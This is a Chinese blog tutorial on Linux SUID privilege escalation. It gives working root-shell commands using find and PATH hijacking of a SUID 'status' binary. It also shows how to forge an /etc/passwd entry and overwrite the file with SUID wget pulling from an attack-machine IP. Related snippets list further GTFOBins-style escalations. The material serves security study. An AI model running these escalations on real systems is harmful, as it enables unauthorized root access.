SUID提权

已于 2024-09-21 20:13:30 修改
阅读量931 收藏 9
点赞数 23
分类专栏: Linux提权 文章标签: linux 运维 服务器 网络安全
于 2024-09-14 17:45:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68636078/article/details/142261513
版权

概念:

SUID:当用户执行具有SUID权限的文件时,会以该文件所有者的权限来运行此文件。当s这个标志出现在文件所有者的x权限位时,此时被称为Set UID,简称SUID。

SUID原理:

  1. 执行过程中,调用者会以文件所有者的权限去执行

  2. 该权限只有在该程序执行的时候才有效

SUID前提:

  1. 具备SUID权限的文件得是二进制可执行文件

  2. 调用者必须具备该文件的可执行权限(x)

# 查找具有SUID权限的文件,且该文件的拥有者是root
find / -perm -4000 -print 2>/dev/null | xargs ls -al
find / -perm -u=s -type f 2>/dev/null | xargs ls -al
# 查看当前shell的编号
echo $$

利用方式:

  1. 能读取文件内容,那查看/etc/shadow关键的配置文件,尝试爆破密码

  2. 能修改文件内容,修改/etc/passwd之类的配置文件

  3. 能执行命令,直接/bin/sh -ip获取一个具备root权限的shell

注意:(具备SUID权限的命令,在执行其他命令的时候,如果不是直接去运行命令对应的文件(如:find -> /usr/bin/find),而是调用/bin/sh -c去执行命令的话,那么不能用于提权)

 参考链接:

GTFOBins

案例:

1、find

查看权限
find / -perm -u=s -type f 2>/dev/null | xargs ls -al

提权

which find
/usr/bin/find -exec /bin/sh -p \; -quit

2、wget

查看权限
 find / -perm -u=s -type f 2>/dev/null | xargs ls -al

passwd权限

如果可读,将其下载下来,做备份

cat /etc/passwd
伪造用户
openssl passwd -1 -salt Coke Coke123
参数作用
-1-1(数字):基于MD5的算法代号。
-salt加密时加点盐,可以增加算法的复杂度。

(shadow更习惯用mkpasswd,passwd更习惯用openssl)

追加用户

覆盖passwd

攻击机:192.168.74.128

开启HTTP服务

python -m http.server 8000

受害机:192.168.74.129

wget下载并覆盖/etc/passwd

cd /tmp
wget http://192.168.74.128:8000/passwd -O /etc/passwd

提权

切换用户

su Coke

3、status

没有现成环境,就以靶机为例

查看权限
find / -perm -u=s -type f 2>/dev/null | xargs ls -al

将其下载下来,并扔IDA里来反编译

攻击机下载
scp jose@172.16.33.92:/usr/bin/status /opt

反编译

提权过程

status运用了service程序,调用过程中没有使用绝对路径,可以自定义service加到环境变量中以获得提权效果

cd /tmp
echo "/bin/bash" > service
chmod 777 ./service
export PATH=/tmp:$PATH
status

并不是标准的SUID提权,类似于环境变量劫持和SUID的结合

可乐葡萄糖
关注
专栏目录
简谈SUID提权
2401_84466336的博客
05-28 1129
SUID (Set UID)是Linux中的一种特殊权限,其功能为用户运行某个程序时,如果该程序有SUID权限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID权限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义.​ 在执行过程中,调用者会暂时获得该文件的所有者权限,且该权限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果ls。
suid提权
m0_62207170的博客
02-28 345
suid提权
LinuxSUID提权学习 - 从原理到使用
Reset
07-01 1127
linux的文件有普通权限和特殊权限(三种)。普通权限一般为:rwx,分别为读写执行,对应的数字表示为421。三种特殊权限为:suid权限,sgid权限,sticky权限。其中suid权限作用于文件属主,sgid权限作用于属组上,sticky权限作用于other其他上。
Linux suid 提权
m0_55628907的博客
09-07 124
suid可以让文件调用者暂时获得文件拥有者的权限,suid提权的思路让普通用户运行root用户所拥有的suid文件,从而达到提权的目的。chmodu+s filename 设置SUID位chmodu-s filename 去掉SUID设置1.查询设置了SUID权限的可执行文件查看机器上具有SUID权限的命令,任意一个即可find2>/dev/nullfind/ -perm -us -type f2>/dev/nullfindls-ldb{};
SUID提权教程
星虐
11-18 1388
SUID提权教程。
LinuxSUID提权方法
内心不种满鲜花就会长满杂草
10-29 3995
SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。 已知的可用来提权linux可行性的文件列表如下: nmap vim find bash more less nano cp 如下,新建一个2.txt的文件。我们查看权限为 -rw-r--r--。接下来我们加上suid权限,即让执行该命令的用户以命令拥有
【Try to Hack】Linux suid提权
开心星人的博客
06-20 822
SUID (Set owner User ID up on execution) 是给予文件的一个特殊类型的文件权限。在 Linux/Unix中,当一个程序运行的时候, 程序将从登录用户处继承权限。SUID被定义为给予一个用户临时的(程序/文件)所有者的权限来运行一个程序/文件。用户在执行程序/文件/命令的时候,将获取文件所有者的权限以及所有者的UID和GID。如果root给一个程序赋予了SUID权限,则普通用户在执行该程序过程中,是root权限。suid权限仅对二进制程序有效(binary program
linux suid提权
qq_42307546的博客
04-15 653
SUID是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行 时,使调用者暂时获得该文件拥有者的权限。也就是如果ROOT用户给某个可执行文件加了S权限,那么 该执行程序运行的时候将拥有ROOT权限 以下命令可以发现系统上运行的所有SUID可执行文件 find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000-print2>/dev/null find / -user root -perm
linux suid提权原理,Linux SUID提权
weixin_32081489的博客
05-13 954
概述findNmaplessbashvim概述SUIDLinux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限,如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具进行root提权。目前可以用来提权Linux可执行文件列表nmapvimfindbashmorelessnanocp用于查找SUID命令可执行文件的命令find / -perm -u=...
操作系统权限提升(十九)之Linux提权-SUID提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-28 1939
SUID是一种特殊权限,设置了suid的程序文件,在用户执行该程序时,用户的权限是该程序文件属主的权限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的权限。sgid与suid类似,只是执行程序时获得的是文件属组的权限。passwd这个命令程序的权限设置,它就是设置了suid权限的只有可以执行的二进制程序文件才能设定SUID权限,非二进制文件设置SUID权限没任何意义.命令执行者要对该程序文件拥有执行(x)权限.命令执行者在执行该程序时获得该程序文件属主的身份.
suid提权linux
weixin_68652890的博客
04-15 1005
suid提权 suid(设置用户的id)是Linux中的一种特殊权限,当运行具有suid权限的二进制文件的时候,使得调用者暂时获得该文件拥有者的权限(比如a文件拥有者是root,且被赋予了s权限,当我们用另外一个普通用户调用a文件的时候,调用过程中这个普通用户会获得root权限) 除了经常看见的rwx权限还有s权限 s权限,设置使文件在执行阶段具有文件所有者的权限,相当于临时拥有文件所有者的身份。 SUID 当执行的文件被赋予了s权限,就被称为Set UID,简称为SUID的特殊权限。简称为SUID的特殊权
SUID提权
snowlyzz的博客
08-14 1801
久经不衰的SUID提权
linuxSUID提权以及文件权限问题
黑锤的博客
11-25 1765
要讲到suid提权的话,首先应该就要非常清楚地知道linux中文件权限的相关问题。 在linux系统上有着非常严格的权限控制,如果想对某个文件执行某种操作的话,必须具有对应的权限方可执行成功。 linux下的文件的权限类型一般包括读、写、执行。对应的字母为r、w、x。 linux下权限有三种分组分别为拥有者、群组、其他组。每个文件都可以针对这三个组,设置不同的rwx(读写执行)权限。 在Linux...
【渗透测试】--- suid提权
qq_43168364的博客
01-13 846
可以用suid来提取的命令(前提是这些命令设置了suid权限) nmap vim nano find bash more less cp awk man 1.nmap 执行:nmap --script=exe.nse,脚本中的内容写:os.execute("/bin/bash") 2.vim 进入vim的编辑模式,执行::set shell=/bin/bash ; :shell 3.nano 执行:nano /etc/passwd , 即可添加root用户 4.find 执行:find /
在 Kali Linux 中安装 Impacket
最新发布
weixin_44023460的博客
09-30 237
在安装 Impacket 之前,你需要确保安装了 Python 和一些必要的依赖。通常,Kali 已经预装了 Python。步骤 3:克隆 Impacket 仓库。步骤 4:进入 Impacket 目录。如果你看到帮助信息,说明安装成功。步骤 5:安装 Impacket。
Linux 安装redis主从模式+哨兵模式3台节点
一千个读者就有一千个哈姆雷特
09-27 416
Linux 安装redis主从模式+哨兵模式3台节点
[Linux]:线程(一)
Bettysweetyaaa的博客
09-26 761
想深入了解线程吗?本文将为你详细解读线程的概念、优缺点、异常及用途,还介绍了 Linux 中线程的控制方法。快来阅读,提升你的编程技能,探索多线程的奥秘!
linux 源代码编译
Lxn2zh的博客
09-27 1358
有时候会在linux上下载源码包,然后进行编译成可执行的文件,这个过程需要经过configure、make、make install、make clean四个步骤。configure 为这个程序在当前的操作系统环境下选择合适的编译器和环境参数来编译该代码。make install 将已编译好的可执行文件安装到操作系统指定或默认的安装目录下。make 对程序代码进行编译操作,会将源码编译成可执行的目标文件。make clean 删除编译时临时产生的目录或文件。
curl 的suid 提权
09-13
对于 curl 的 suid 提权,我可以给你一些建议,但是请注意使用 suid 提权可能存在安全风险,需要谨慎操作。 Suid 权限是一种权限设置,允许普通用户在执行特定可执行文件时以文件所有者的权限运行它。这种设置通常用于提供普通用户对某些特权操作的临时访问权限。 要实现 curl 的 suid 提权,你可以按照以下步骤进行操作: 1. 创建一个新的 shell 脚本,比如 "curl_suid.sh"。 2. 在脚本中,设置需要执行的 curl 命令,比如 `#!/bin/sh \ncurl <your curl command>`。 3. 将该脚本的所有者设置为 root,并将 suid 位设置为可执行。可以使用以下命令进行设置: ``` $ sudo chown root:root curl_suid.sh $ sudo chmod 4755 curl_suid.sh ``` 请注意,这种设置可能会引起系统安全问题,因此建议你仔细评估风险并确保只有可信用户可以访问该脚本。 此外,还有其他提权方法和技术,但出于安全考虑,我无法提供更多细节。如果你需要更深入的了解,请查阅相关资料或咨询专业人士。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值